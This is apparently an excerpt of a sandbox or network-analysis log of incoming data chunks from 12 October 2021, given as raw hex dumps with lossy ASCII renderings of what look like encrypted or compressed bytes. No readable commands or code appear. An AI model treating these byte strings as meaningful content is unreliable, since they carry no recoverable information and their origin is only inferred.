2021-10-12 14:35:51 UTC	16	IN	Data Raw: f0 38 43 f0 5e b6 9e 52 c9 f8 b4 ac e6 39 62 1f 4f d9 87 22 c8 90 c7 30 a1 d4 26 d1 21 e9 2f 85 4f 84 79 b8 39 dd c4 b7 b9 ed 64 a5 68 ed 72 38 2c f1 86 ca 9d 4a b0 70 4e bb ea 83 21 64 25 48 05 a3 2b 71 7d 51 d0 0b 6b 83 05 c2 0c 58 ca 9f 1c d0 23 07 cb 58 b3 8b 10 1a 5f d9 91 d0 04 76 c4 34 ca d1 a9 8a ec 3c ff e1 3a b1 06 c1 6b b3 b3 90 83 fe 78 73 29 e8 fd b6 eb dc c9 d2 42 17 56 92 7b a4 26 8a 42 a4 90 bc b3 4b 5a ca 96 99 fd 94 aa 06 fa 89 08 22 d0 40 ec 9d db f6 5c d5 46 eb c1 a9 82 e9 0b 9b 64 2b 3b 82 3b 99 74 5b 71 f0 1b 2a 65 d7 83 c7 df 2a 8f 3c 45 10 f3 42 da 48 b0 38 a3 85 19 c3 89 a5 8d 0f 3a 27 fe c2 2c 2a 75 6b fd c9 1e 00 be 0f e5 cd 1f 16 bd 10 1e 4a 5f dd 02 2c cc a7 0c 5d 62 0d b6 59 f7 de 15 26 88 93 41 4c e8 70 3d e5 0a 1f cf c1 29 Data Ascii: 8C^R9bO"0&!/Oy9dhr8,JpN!d%H+q}QkX#X_v4<:kxs)BV{&BKZ"@\Fd+;;t[qe<EBH8:',*ukJ_,]bY&ALp=)
2021-10-12 14:35:51 UTC	18	IN	Data Raw: 88 fe ea 41 ce 51 de 1d 63 fa 1b 66 dd 79 f7 49 fa d1 5d 47 57 66 ab da ee de 16 92 4c 41 dd f2 29 6a 6d 8e 62 f7 23 80 8e c8 41 f9 31 63 72 56 8d dc d4 55 fd 11 64 6c 6b c1 69 d2 42 4e be 72 89 13 56 af 7b 39 8c 24 34 1c e4 ef ce 1f 4d f6 1f 4e 02 6b 38 bd e3 02 10 09 73 76 4e 1c 52 f2 4b 26 7f 17 71 6c e7 ff 99 36 9b dc 48 75 08 6c 25 e1 85 9f 6c 5d 25 aa 0a fe 21 83 5f 1c d8 47 6d 14 35 5f 28 34 aa ec 76 fc 12 74 61 0a c1 d9 a6 af 42 17 d2 0a 4a 13 ec cc d4 95 58 91 82 19 23 32 d6 9b 5a fa 5f 49 5a 88 88 ad 97 8e cc 9a 7b 0a 7d 55 12 9f 79 c0 8f b8 f8 0d da db 36 3e 3b dc 62 82 24 46 73 c9 65 f4 04 3d 5b 3b f7 b4 59 c8 3b d4 eb c0 30 17 da 3a 0b 0a 51 05 a0 56 27 24 19 04 ee 75 d0 8e a8 9c 6a 9f 20 c1 dc 51 0c 60 70 c2 81 24 06 cd 0b 90 df 62 45 05 c1 Data Ascii: AQcfyI]GWfLA)jmb#A1crVUdlkiBNrV{9$4MNk8svNRK&ql6Hul%l]%!_Gm5_(4vtaBJX#2Z_IZ{}Uy6>;b$Fse=[;Y;0:QV'$uj Q`p$bE
2021-10-12 14:35:51 UTC	19	IN	Data Raw: cb 5f a2 a2 38 48 06 d0 97 f8 2d 76 c4 3e 8b 86 a9 8a e5 2f d7 c9 e1 b3 06 c6 67 a2 99 83 f2 e6 56 79 36 c5 ee b0 7c dc a6 1b 4e 17 5c 85 9f a6 2e e4 8b a4 90 b6 36 bc 58 aa 9e f6 34 94 0a 05 ed 77 06 7d c1 46 99 54 db f7 56 c2 b8 e9 32 99 b4 e8 05 9b 1a 25 81 8b 3f f5 53 99 73 f0 07 02 af d6 83 cd 9f a1 46 35 45 01 e5 6a b1 4a 6c 37 8b 46 14 c3 8f bf 1a 1a 3a 26 ff d1 6c 3b de 74 d5 0d 12 00 b8 07 34 00 1d 16 b4 38 39 4a 45 d7 a0 3c 8c b0 24 99 68 07 b0 48 f0 f6 d1 24 9e 9f 69 6b e7 70 37 47 01 5f d7 e8 ed d2 38 d6 c9 5c c9 06 ed 29 dc 50 85 8a a0 15 60 cd f8 a5 ae 94 f3 2d ce f5 7e 34 71 aa 00 85 bc ab da 19 b9 34 1a 34 23 3c 39 78 11 d3 ea c6 d9 28 89 69 75 71 dd a3 c7 b0 4a 1b 67 8c a8 25 80 d8 71 ac 1c 82 0c 81 90 16 a3 36 11 01 1d 94 3e 95 6e 00 10 Data Ascii: _8H-v>/gVy6\|N\.6X4w}FTV2%?SsF5EjJl7F:&l;t489JE<$hH$ikp7G_8\)P`-~4q44#<9x(iuqJg%q6>n
2021-10-12 14:35:51 UTC	20	IN	Data Raw: 3c 8c 7f d4 50 9f f5 ee 51 e3 92 f7 f1 63 d1 18 76 8b 86 08 b0 d4 d3 5d 47 51 64 9c b7 3c 42 16 98 64 42 dd f2 32 68 68 a2 68 74 23 86 a8 15 6a fc 28 9d 56 52 bf ca d8 45 fd 28 70 6e 68 f3 af d3 6e 4c 5b 25 88 13 56 ca 66 3d 8c 31 28 40 86 ee e2 0e 51 14 67 4e 02 60 29 92 02 42 06 2b 90 21 53 09 f4 e3 1a 35 1a fe 70 40 e4 de d4 ae 90 c6 73 26 0a 7d 27 99 03 9e 40 54 9f a8 4e e6 18 df 40 e2 df c9 79 43 06 69 42 30 aa f7 61 a6 fe 37 33 15 e9 ea a2 87 32 1a cb 13 ec 02 bd d2 ea 0d 5b bd 87 ac 21 76 fe f1 5e e4 ab 60 11 88 a3 ae 87 de 33 65 82 13 6d ec cc 97 70 44 10 5a 56 1b f6 e8 28 38 3b 5d 0f fa 24 6e 79 e1 1c de dd 39 73 41 fd c7 8d e1 15 d2 f8 c1 93 80 da 3a 0f 0e 37 14 a7 22 28 37 1e 28 b9 95 d1 84 70 f4 ea 90 5e da d8 48 3b 00 a6 54 e1 08 3c f4 24 ff Data Ascii: <PQcv]GQd<BdB2hhht#j(VRE(pnhnL[%Vf=1(@QgN`)B+!S5p@s&}'@TN@yCiB0a732[!v^`3empDZV(8;]$ny9sA:7"(7(p^H;T<$
2021-10-12 14:35:51 UTC	22	IN	Data Raw: 8c 39 e4 60 04 e7 4d a4 8a fc 4a 5d df bf 11 21 76 c2 51 9a 8f a9 80 e0 32 db c9 f3 ac 17 39 66 8e 97 84 a2 94 56 79 32 45 e6 b0 fa d1 b9 09 4e 17 54 9a 95 58 2f c9 80 a3 8b c8 bd b5 58 ae 32 e9 25 98 aa 04 f6 89 0b 51 d2 40 ab b3 d9 f6 50 ea 50 eb 9e 96 db 90 0b 9b 10 2f 27 8e 3f fd 4a 67 72 dc 1f 15 a3 d7 8b d2 8d 5f 8e 10 47 2a f3 52 c1 b4 4f c1 a1 5d 2b c7 8f 74 00 1a 3a 0d ff d1 7d 39 1d 82 d5 0d 16 6f 8c 07 cd 03 72 23 bb 38 33 40 82 64 a0 3d 8c 95 0c ae 60 0d ba 44 fc de 2e 24 88 9f 7a 6f c8 70 33 47 1b d2 ac e9 ed d3 35 06 90 56 c9 07 cb 3d dc 50 bc a8 a0 14 6f c7 f1 2b 03 4c 4b 3f cb e3 75 25 37 cf 01 84 b2 a1 d3 08 ec 2c 1b 1c 6e 3c 39 7e 2d d4 9c ab 09 54 89 69 28 53 c9 a3 c9 ba 62 1b 0c 86 a2 49 d4 f0 e0 ac 06 88 bb 93 96 00 b2 30 7b 02 0e 93 Data Ascii: 9`MJ]!vQ29fVy2ENTX/X2%Q@PP/'?Jgr_G*RO]+t:}9or#83@d=`D.$zop3G5V=Po+LK?u%7,n<9~-Ti(SbI0{
2021-10-12 14:35:51 UTC	23	IN	Data Raw: d1 26 8c e0 9a 2b 5e 76 c0 3e 88 fe ee 4d ee 68 f6 cc 65 e2 e3 4f db 6a 89 6d d2 f9 59 6f ae 77 ac bf 53 b3 16 98 6e 6f c4 e1 27 7e 6a a2 4b 09 22 aa b3 13 14 ff 30 63 5d 00 9f dc d4 5b e6 b6 66 57 42 e9 51 d8 54 ba 62 7b a2 0f 45 d5 75 28 88 3c d2 5d 54 ea d9 35 4b 68 0e 4e 13 6e 3d 03 f3 6e 05 36 af 70 4e 0b f4 fe f5 30 2d 02 5a 69 db be 23 cb 64 d2 77 f4 06 64 2a bf 4b 89 46 57 87 bb 51 d6 0d db de 1b de e5 53 54 2c 66 79 7c aa e6 63 3e 20 36 1f 18 bf fd a2 87 3c 3b ec 7e cb 02 ac d2 eb c0 42 ef a1 bb 32 76 70 57 4c cb 79 49 77 8a 88 ad 92 a3 11 c9 7a 1b 7a 11 de e1 5a ca a7 6c e2 3e ca 8d 3d 3c 3b de 83 4d 32 77 75 c9 46 f6 04 3d 5e 42 2a 87 54 e0 15 fc a2 c6 ed 9c d8 24 4b c9 66 05 a0 22 3e 37 1e 28 fe 9a d2 84 70 ca 54 91 20 cb eb 51 41 1e 58 55 85 Data Ascii: &+^v>MheOjmYowSno'~jK"0c][fWBQTb{Eu(<]T5KhNn=n6pN0-Zi#dwdKFWQST,fy\|c> 6<;~B2vpWLyIwzzZl>=<;M2wuF=^BT$Kf">7(pT QAXU
2021-10-12 14:35:51 UTC	24	IN	Data Raw: 2d 9c 06 d8 c4 8c 31 fc 43 ee c9 5e a2 a0 27 30 6e c0 e9 f0 23 76 c0 16 ee 8c a9 8c c2 0b d7 c9 f1 33 0e c7 67 a6 44 4e 88 ef 56 7b 27 bc dd a9 84 dd a6 1b 46 3f 51 86 85 a0 06 c1 8b a4 9a 36 ac b5 58 ae 4d 59 36 94 aa 0e f2 0d 39 64 bf 4e 83 54 df de 58 c1 b8 ef b6 b4 b4 e8 01 1b 12 25 3b 86 e2 64 5e 99 73 f2 02 79 9c ce fd c5 9f a1 8b 14 4a 02 f6 6c 99 6e b0 3e 81 c6 13 c3 8f bb dd 69 38 27 ff d3 73 1b 06 64 ab 05 1c 00 bc 2f 97 0b 1d 10 93 1c 39 4a 55 57 a8 3d 8c b4 f9 cc 62 0d b0 60 fa f6 d1 22 e7 9c 68 6b e2 1f 3c 46 1b 55 ff ed ed d2 3e b9 e5 57 c9 0c 8c 23 dd 50 bc 96 5e 14 30 cf e7 b7 4a 95 e5 d2 cf aa 7c 14 97 a0 00 85 4c aa cc e7 e8 61 18 14 8a 3c 39 78 f5 d2 fc 39 d8 77 a5 03 2b f7 a2 a3 c9 b1 25 17 0c 86 a2 4a 88 d9 71 a6 2e 92 0f 80 96 79 3e Data Ascii: -1C^'0n#v3gDNV{'F?Q6XMY69dNTX%;d^syJln>i8'sd/9JUW=b`"hk<FU>W#P^0J\|La<9x9w+%Jq.y>
2021-10-12 14:35:51 UTC	25	IN	Data Raw: 3a 02 83 e7 0b be 13 8a fa 62 35 49 6d e3 52 99 e5 f1 74 03 6d da d3 63 eb 16 66 e6 78 f7 45 c1 fd 42 64 42 6c ac a4 27 c9 e8 99 48 66 c5 e1 38 7e 6a bd 4f e4 dd 87 84 1f 6a f3 2b b5 44 75 a5 c8 c7 44 ee 3d 6b 60 78 17 50 fe 4f 46 72 5c a0 01 57 d1 7f 35 93 35 3f 47 78 fe d5 00 46 85 0b 62 0c 68 3a f6 da 50 07 21 b6 67 58 05 e1 f0 10 31 10 1b 6e 45 1d d6 f0 3f 8a d1 71 37 dc 7f 28 91 d7 8c 77 57 96 a0 55 c7 f7 da 71 17 cf ee 6d 5a fa 64 5a 2b 88 f5 7e be 11 2d 00 2a 3f d8 8e 8e 00 9a d2 00 e8 1d 9b c5 e7 f3 4b 8a 9b 96 cc 73 d2 eb 4b f1 44 79 eb 99 83 b4 91 b5 d7 9a 6c 00 65 1f 3e 9e 55 c1 b6 63 eb 09 0a e0 13 23 1d c9 16 fa 35 5d 66 d1 f3 f7 28 2a 62 41 e0 6e 44 36 98 ff eb c6 ec 89 df 25 3a 31 7d 05 b1 47 2c 2d e0 2d fa 7b d2 95 7d ca 05 90 20 cb cb 58 Data Ascii: :b5ImRtmcfxEBdBl'Hf8~jOj+DuD=k`xPOFr\W55?GxFbh:P!gX1nE?q7(wWUqmZdZ+~-?KsKDyle>Uc#5]f(bAnD6%:1}G,--{} X
2021-10-12 14:35:51 UTC	27	IN	Data Raw: 79 fd 1a 64 98 3c 4a 1f 57 ce 9d 3e d0 8f 04 cb 54 b1 ac 29 47 47 c8 99 2e f5 65 cb 3c f3 80 81 9b eb 2f dd c5 ea bc 1c 11 74 ad 9b 92 85 c7 47 78 38 cf e3 a1 f5 cf 70 08 4d 15 4d 8a ad b7 2f e5 81 b7 9d a7 ab af 49 a7 46 20 27 9b a8 1d e2 5f 1b 7c c1 4c 90 51 ca f9 4c 14 ab e6 8f 95 a3 32 1c 4d 97 0e 3b 82 3e e6 58 9b 62 ff 0c 06 b9 c6 86 e5 89 a0 8f 36 46 10 fa 05 ad 4b b0 34 b2 6a 1a c3 8f b7 20 14 ba 27 ff 91 f3 3b 35 7d d6 1c 10 6f a5 06 cd 03 72 08 ba 38 33 62 0d d7 a0 3b 9f a4 35 8d 71 1d b8 60 ae f6 d1 22 9b 87 6e 07 cb 70 37 47 1b 5f d7 c9 ad 89 1b d6 ec 56 c9 06 e3 d9 e3 09 9e 11 a0 15 65 7a ef 73 39 bf f3 2c cf e6 6d 25 21 b1 13 82 de 88 da 19 e9 3e 1a 34 0f 7c 62 50 14 d2 ea cd f1 08 88 69 23 7f f5 b4 ca b0 4c 74 14 87 a8 2f a3 ca 60 a8 17 91 Data Ascii: yd<JW>T)GG.e</tGx8pMM/IF '_\|LQL2M;>Xb6FK4j ';5}or83b;5q`"np7G_Vezs9,m%!>4\|bPi#Lt/`
2021-10-12 14:35:51 UTC	28	IN	Data Raw: 2e 7d d6 ab 8b 97 0c 85 f0 0a 5c 30 88 fa 65 3e 66 6a d0 f1 88 fe e4 4e 71 53 f6 dd 60 d2 2e 4f f7 73 e0 c3 ed f9 5d 46 79 c1 ac b5 36 f6 4c 98 64 6f ca 24 ae 55 7b a6 51 e4 24 97 ae 01 53 e1 32 63 51 66 37 db d4 5f ef 3f 7b 6e 67 ff 40 d5 e0 55 68 40 9e 9f 69 d1 75 38 2e 31 27 4f 74 fe c2 0b 42 63 87 61 02 6a 2a ee ff 53 0b 37 ab e8 5f 17 e7 f5 97 20 0c 17 59 cb e3 d7 d6 12 8a d7 76 b2 26 73 32 82 eb 05 44 46 87 bb 40 36 1b db 5d 07 f6 f1 7c 54 26 5f 65 35 aa ec 11 ac 00 36 04 0f c6 c8 a5 96 3f 99 65 18 32 14 30 a5 d9 f2 5a 9b 97 b3 23 7a ea c8 40 f9 55 67 2a 07 8f ab bf a7 df 96 6c 17 6c 2b c5 b7 68 ca a7 62 58 1c d0 e0 13 2d 30 ce 19 ed a9 69 79 e1 0c e5 09 2a 7e 51 e0 28 42 ed 3d 77 eb c6 e7 8b d7 2c 9b 0e 6d 14 ab 4a a9 1f 0f 2c d6 7f c3 81 02 f0 14 Data Ascii: .}\0e>fjNqS`.Os]Fy6Ldo$U{Q$S2cQf7_?{ng@Uh@iu8.1'OtBcajS7_ Yv&s2DF@6]\|T&_e56?e20Z#z@Ugll+hbX-0iy*~Q(B=w,mJ,
2021-10-12 14:35:51 UTC	29	IN	Data Raw: 09 72 2c 6e 63 68 d4 1d 75 a1 3b 9d 0c 52 dd 89 27 e9 ba 13 d4 46 8a b4 39 48 57 c8 b5 e9 07 19 e3 3f e2 85 b8 a8 fb 0c b8 e1 fa b3 0c d6 45 b5 f6 aa 8b ef 5c 68 1a dc 81 9a fb d5 ac 0a 60 78 77 84 85 ac 3f e1 9d b5 94 38 13 da 74 ab 90 fc 27 b1 b5 4c 60 5c 0a 7d c0 55 a2 45 fe e9 7e d3 99 ff 81 d0 9c fe 0a 9b 10 56 1e 83 3f ff 4f bf 62 d6 0c 23 c0 f5 82 cd 95 b2 a8 2d 62 29 e1 6b b1 40 98 69 89 46 1d eb a1 bd 00 1c 55 5f ff d1 66 28 1d 7a c4 0b 0d 28 d7 3d cc 09 17 c8 b7 29 1f 66 58 c6 86 52 db b0 24 93 bc 0a ba 96 e7 f1 db fa 9d 92 63 b5 f9 55 1f 70 1b 5f dd fa c4 fa 00 d6 ec 5c 17 06 e4 03 da 7a f7 fc a0 15 6d cd f8 a5 00 94 f3 2c ef f5 7e 34 e6 a0 00 85 a3 ab da 19 e9 3e 1a 34 2d 3c 39 78 fc d3 ea c7 f8 28 89 69 31 7a dd a3 d8 b0 4a 1b 0d 86 a8 25 8d Data Ascii: r,nchu;R'F9HW?E\h`xw?8t'L`\}UE~V?Ob#-b)k@iFU_f(z(=)fXR$cUp_\zm,~4>4-<9x(i1zJ%
2021-10-12 14:35:51 UTC	31	IN	Data Raw: 1e 9d 9c 96 5f 27 6c c1 b0 bc 02 f0 84 da 16 c0 3b 9e 6a 48 b8 6d 6b eb 5d 88 ef e1 49 ea 92 f7 f1 6e eb 17 56 6d 51 e6 4f d2 f3 4e 43 4e 6f bf ba 3c cf 19 87 6b 9b dc de 2e 6f 77 be c0 ce 6d 7b 57 ea 64 e8 22 6c 57 6f b5 c3 da a1 ef 00 7e 6e 66 ff cb fa 53 44 63 5d 83 0c 59 c2 7a 39 9d 2f 37 a2 79 c3 b3 0b 86 fa 0a 4e 03 42 3f fd f2 48 2e 3d bf 74 48 01 7d e4 0b 31 00 13 7b 7d e9 c1 db 1c 8a da 60 28 a8 7d 29 99 e2 bb e0 68 87 bb 4b 44 18 d1 45 0d d9 47 6d 5e 35 61 dd 0b aa e6 64 1c 11 3c 05 03 d1 55 9d 87 38 16 70 11 e2 11 a7 c7 f7 e7 4e 8a 09 94 32 72 ff f3 56 eb 59 77 2a 16 99 a7 a8 b0 50 8b 71 03 6d a6 d1 93 60 dc 3b 79 f6 17 ca 6f 09 30 2c f2 aa fa 24 4c 5f fd 1e f9 04 2a 7c 58 e7 4a 52 cc 36 c5 e1 de 77 b2 cb 3a 0b 28 b6 17 a0 5c 28 1f 0a 2c d6 7f Data Ascii: _'l;jHmk]InVmQONCNo<k.owm{Wd"lWo~nfSDc]Yz9/7yNB?H.=tH}1{}`(})hKDEGm^5ad<U8pN2rVYwPqm`;yo0,$L_\|XJR6w:(\(,
2021-10-12 14:35:51 UTC	32	IN	Data Raw: d5 3b 6f 34 68 3b 9d 28 5d 79 6e fa 0b 62 96 24 62 0d 74 ce a7 34 c0 e0 fa 34 a1 b5 a9 13 42 5f dc dd 69 3c 7b ea 3c f4 84 ac af a0 38 01 9d fe f9 0e f6 d2 b4 b3 90 ba ed 56 44 38 c5 ee f3 fa d5 b7 0d 4e 3c 73 85 8d b1 d0 e4 a7 a6 88 ba a4 bd 40 54 91 da 39 ea 9d 0c ed 73 79 36 c0 46 89 5f c2 fa 56 ca ae 17 9f bc b6 ff 07 9b 12 3c c5 83 13 f7 77 9b 58 3f 1a 00 c0 9b 82 cd 95 8b 8f 3c 45 12 c6 68 b1 1f b0 3e 8b 02 1b c3 9e a9 0c 31 77 27 f7 c6 92 3a 19 7f cd 01 1c 08 a1 f9 cc 25 19 0f 91 22 35 4a 57 cf 5e 3c a0 bc 26 8b 61 25 fd 49 fe fc fc 2d 91 99 69 63 f2 8e 36 6b 16 58 b8 a7 ec d2 32 ce df 4e de 2c f8 25 dc 58 a0 7e a1 39 6d da f4 a5 bc 8f 0d 2d e2 f7 55 36 18 11 1a af b2 ab da 02 d9 3c 1a 02 2f 3c 39 78 0b d3 ea c5 f4 29 a3 6b 46 82 dd a3 c3 9c 5f 19 Data Ascii: ;o4h;(]ynb$bt44B_i<{<8VD8N<s@T9sy6F_V<wX?<Eh>1w':%"5JW^<&a%I-ic6kX2N,%X~9m-U6</<9x)kF_
2021-10-12 14:35:51 UTC	33	IN	Data Raw: dd bc fb b3 c2 1e 97 82 81 45 3e 77 4c b6 b4 14 ba 19 ff 05 d2 83 14 fc 72 23 68 79 d0 44 89 fe e4 5f f4 e2 41 c5 bb ff 71 6d f7 79 f7 4f d2 f9 2d 07 0a 5f 3d b5 3c d4 a2 04 6d 6c 53 45 34 a4 7e 86 50 f6 23 86 f5 a1 e7 f1 1b 63 57 7e a9 ec d1 5f 67 2c 70 7f 24 e9 51 c3 6a d3 63 57 82 11 39 49 75 39 86 2d 25 d2 cf cf 31 1f 56 7b 3b 45 2a 4b 28 fd f4 31 51 20 bc 7e 34 32 67 e3 0b 3b 02 6f e9 6c e3 dd d0 3c 15 6d 40 dd 0a 6c 23 bf f6 b7 4d 54 87 bd 39 b1 08 db 57 66 c7 ec f2 e3 fa 7f df 83 7c f1 bf a9 d6 bb 34 1c c1 d8 a8 81 2e 00 4e 06 ff 0b 22 61 48 6f 53 87 82 a3 3b fc 49 c8 4c fb 55 6b 3b 92 81 25 08 70 c4 14 ca af e6 32 d6 99 60 c3 29 df 2c 05 52 44 30 2a 3a da 07 fc 0e 58 7b c9 1e c6 0d 3b 45 46 f7 b4 1a e0 15 c5 fd d5 e9 a2 f2 3b 0b 22 66 14 a4 46 cd Data Ascii: E>wLr#hyD_AqmyO-_=<mlSE4~P#cW~_g,p$QjcW9Iu9-%1V{;EK(1Q ~42g;ol<m@l#MT9Wf\|4.N"aHoS;ILUk;%p2`),RD0:X{;EF;"fF
2021-10-12 14:35:51 UTC	34	IN	Data Raw: 9c 63 73 a3 53 81 4d 62 34 61 61 63 29 60 6d 75 dc 6e 6b 81 36 62 0d 74 c5 8e 32 85 d7 05 cb 5a be ae 38 40 47 27 96 d4 36 74 c2 39 e1 e0 31 8a ea 25 b8 eb fa b3 0c ba 2f a2 99 87 91 e3 56 71 20 3b ef 9c f2 a6 c7 1a 42 1d 57 9c 89 a6 26 f2 75 a5 bc b4 bc b9 58 a2 89 08 35 b8 a2 7f 8f 76 0a 77 cb 5c 8f 54 d3 e0 a8 c3 94 eb 89 9c b4 e0 17 65 1b 09 39 a9 3d de c5 b3 68 c0 19 02 d5 d7 83 cd d2 a1 8f 2d 51 0a 85 0b b0 4a ba 32 f8 24 1a c3 85 b2 02 61 72 27 ff d5 7f 3d 46 5b d4 0d 16 13 bd 16 c8 18 1b 79 9c 39 39 40 4e d2 b8 52 a5 b1 24 93 71 08 a8 27 d4 f7 d1 2e 80 96 06 f3 e8 70 3d 54 1f 4e d2 86 8e d3 38 dc ff 51 d8 01 f2 2d ca 41 b2 0e 17 7a 43 cc f8 af bf 4a e9 3d cb 9a 1a 35 33 aa 09 ea d7 aa da 13 35 e0 10 3d 03 3a 30 17 5c d3 ea cd 05 2f a1 1f 29 7b d7 Data Ascii: csSMb4aac)`munk6bt2Z8@G'6t91%/Vq ;BW&uX5vw\Te9=h-QJ2$ar'=F[y99@NR$q'.p=TN8Q-AzCJ=535=:0\/){
2021-10-12 14:35:51 UTC	36	IN	Data Raw: 57 c2 1e b6 69 2b af 06 de f3 12 97 8b 90 b2 29 40 d9 b8 a1 79 9d 85 f6 1a cc 3b 88 f2 73 d4 73 52 fa 4a 84 fe e6 49 f1 92 f7 f1 40 f8 66 05 f7 79 f3 4c fa 97 5c 47 5b 74 84 da 3d de 1c 9b 4c 15 dc f2 29 56 f3 a6 50 f1 05 99 a5 19 7b f0 2a 9d 56 52 bf db f8 46 f2 20 70 77 76 17 50 fe 4b 46 18 1d 88 13 52 da 6e 35 8c 28 31 a2 79 c3 ee 1d 2d 30 0a 4e 06 69 03 93 f3 42 0c 22 94 1b 4f 1a fa e0 23 41 00 00 7b 44 6b d7 dc 32 bd c4 6c 22 02 73 2a 70 fc b3 75 54 af d4 4b e6 03 d9 26 57 de e5 78 7c 5d 76 51 3e 93 98 9a 41 ff 29 15 10 c1 d1 bc 79 39 3b da 38 c4 fd 53 29 e3 fa 56 91 8c a4 38 8c ff cc 55 f8 56 49 4d 8b 88 a1 c2 ed cc 9a 79 04 71 36 c0 97 61 34 a6 44 d1 0e f4 9d 19 3c 31 fa 05 f9 24 46 20 a4 0b f6 04 3b 2a b8 08 4b b1 1e ea 2b 09 38 12 65 38 c4 f4 dd Data Ascii: Wi+)@y;ssRJI@fyL\G[t=L)VP{VRF pwvPKFRn5(1y-0NiB"O#A{Dk2l"spuTK&Wx\|]vQ>A)y9;8S)V8UVIMyq6a4D<1$F ;*K+8e8
2021-10-12 14:35:51 UTC	37	IN	Data Raw: 88 98 95 9d 40 bc 65 48 a7 54 81 27 1c 55 61 2d 67 01 f7 79 79 f1 23 d5 89 2d 96 63 62 cd 8c 3b fe b6 a4 c9 5e a4 dc 58 48 5d dd bf 5a 21 76 c2 16 5c 8f a9 80 85 15 d6 c9 f1 b5 2e f2 64 a2 9f fd ea ef 56 7d 10 f3 ed b0 fc fd 82 1b 42 1d 33 bf 84 a6 24 e3 a3 03 92 b6 a2 cb 38 aa 90 f2 1c a3 a9 0c eb 5f 2e 7d c1 4c ec 6e da f6 5c c4 90 d1 9d 90 b2 96 6b 9b 1a 21 13 0a 3d f5 5a b1 cd f0 1d 08 c0 ed 82 cd 95 a7 a7 05 46 01 f0 14 d1 4a b0 3a a3 ca 19 c3 89 97 be 1a 3a 2d 90 eb 6d 3b 3f 7b fd 82 1e 00 be 79 ad 09 1d 12 93 a8 3b 4a 59 ff 1e 3d 8c ba 4b a3 61 0d ba 4e d6 cc d2 24 8e eb 09 6b e8 74 1f df 19 5f d1 c1 53 d2 38 dc 83 6c c8 06 e9 2f f4 d9 b4 80 a6 6b 0f cd f8 a1 9c af f0 2c c8 dd 5a 34 33 aa 6f bf b3 ab d0 1f c1 02 19 34 29 42 59 78 0b d7 c2 55 db 28 Data Ascii: @eHT'Ua-gyy#-cb;^XH]Z!v\.dV}B3$8_.}Ln\k!=ZFJ::-m;?{y;JY=KaN$kt_S8l/k,Z43o4)BYxU(
2021-10-12 14:35:51 UTC	38	IN	Data Raw: 0a ac 5d ec 46 57 cc 2f f1 6a 07 ad 05 1d e9 1e 9d ab d4 4f 28 6a f8 9b a3 16 04 ea cc 1d d1 3d 8f d2 3d 29 72 78 d0 eb 8a fe e8 7e de 6c f6 d7 49 a0 1e 4e f1 51 d3 4f d2 f3 32 7d 50 77 a6 b2 14 85 15 98 62 4d 64 f0 23 78 53 85 50 f7 29 ae f4 16 7b fe 19 47 57 7e b0 b3 ee 5e ee 26 77 10 12 e8 51 d8 2d 3b 62 57 82 00 51 fa 16 2b 8b 08 ac 5d 78 e5 c2 18 5e 14 17 4f 02 60 26 f4 da 6d 06 21 b6 59 4c 31 b9 ea 23 83 01 00 77 7f e7 c6 d8 ba 2c cc 51 18 1b 68 30 87 eb 8c 64 7c ae aa 43 f7 01 41 4e 1a cf e3 7a 7c 08 77 51 3e b9 e3 74 bb 28 07 1f 1c cb f5 ab 96 3d 1f db 28 59 02 ac d0 ed fb 4d 47 97 b3 23 7a ef e9 d4 4d 67 ae 2f 8d a0 2a be a6 c6 b7 e9 c5 74 28 c7 61 6f de a7 68 e1 62 8b f3 18 36 e7 f0 0c ea 24 46 7b e1 8d f7 79 c6 72 49 f7 b4 53 e0 0e e4 ef c6 ff Data Ascii: ]FW/jO(j==)rx~lINQO2}PwbMd#xSP){GW~^&wQ-;bWQ+]x^O`&m!YL1#w,Qh0d\|CANz\|wQ>t(=(YMG#zMg/*t(aohb6$F{yrIS
2021-10-12 14:35:51 UTC	39	IN	Data Raw: 69 d4 53 29 25 d3 cd 97 9d 4c d9 e9 61 93 51 92 24 73 31 49 49 60 29 77 14 89 f7 0b 61 98 28 b4 69 5b cc 8a 5e 08 9e 05 c1 3e 9b 25 38 48 5d cf 1a d3 23 76 c5 2d e8 86 81 ec e9 2f d1 a6 66 b3 06 cd 6e 8a 12 82 8a e5 39 f5 39 c5 e4 98 d5 d5 a6 11 1d 3b 7b 8c ad 2d 2f e5 81 cb 1c b7 a4 bf 4e be b8 7b 35 94 a0 2a e4 5f 81 7c c1 4c ec d8 da f6 5c ea 0e e9 9e 96 a7 e2 20 8c 13 0d b0 83 3f ff 33 17 72 f0 17 6d 23 d6 83 c7 b7 17 8f 3c 43 12 fc 42 f6 4b b0 34 9a 40 0a ca a7 dc 03 1a 3c 48 75 d0 6c 3d 5a e5 d5 0d 16 11 b2 2f 7a 09 1d 10 a8 3d 12 5f 4e d1 b1 34 a4 d3 27 99 66 62 3a 49 fe f0 f9 9c 88 95 6f 78 ed 61 33 6f 94 5e d7 e3 c0 ed 29 d1 c4 d9 c8 06 e9 04 ea 41 b3 ac 92 66 4d cf f8 a3 a7 9f e2 27 df f1 11 1c 31 a0 06 94 b9 ba dd 76 cd 3c 1a 32 3e 37 28 7d 64 Data Ascii: iS)%LaQ$s1II`)wa(i[^>%8H]#v-/fn99;{-/N{5*_\|L\ ?3rm#<CBK4@<Hul=Z/z=_N4'fb:Ioxa3o^)AfM'1v<2>7(}d
2021-10-12 14:35:51 UTC	41	IN	Data Raw: d0 33 66 f5 25 13 ae 75 aa 40 48 c4 f9 49 44 01 80 16 21 e6 0d 92 83 9d 49 30 92 d1 93 aa 65 b2 85 f6 16 db 2e 9b ff 64 3b 77 69 06 53 a4 fd f6 45 f8 6c e7 d8 77 04 1c 62 f4 6e e4 4a d2 e8 58 58 41 89 ad 99 3e f5 13 a0 dd 9b 22 0d 25 54 7b a6 50 e4 13 85 a8 42 7a f8 31 3f 57 7e ab c3 cc d2 c5 2c 70 7e 66 ef 47 f2 a3 44 63 57 14 15 41 f1 85 39 8c 20 b0 5a 60 cf 0d 1f 56 7b 96 48 1b 4a f9 fd f2 42 9a 27 a6 54 eb 1a f0 e3 97 37 1a 20 c5 6c e3 d7 40 32 87 fa e7 22 0a 6c bf 88 e0 bf fa 57 87 bb d6 e0 17 c4 34 80 d8 fa 75 4b 54 eb 57 2b a0 f9 2e 22 06 29 14 03 9b 45 a4 98 34 08 ff 9c ee 1d a1 c9 c0 6f 5c 8e 8a a4 3d ee f8 ff 55 e5 4b fd 3b 95 98 b4 8b 3a ca 85 6c 04 68 a6 c6 80 6b d5 df f4 fc 12 cf ec 4e a0 3d c5 19 da 8f 46 79 e1 91 f0 1b 2e 53 d7 f7 b4 53 7c Data Ascii: 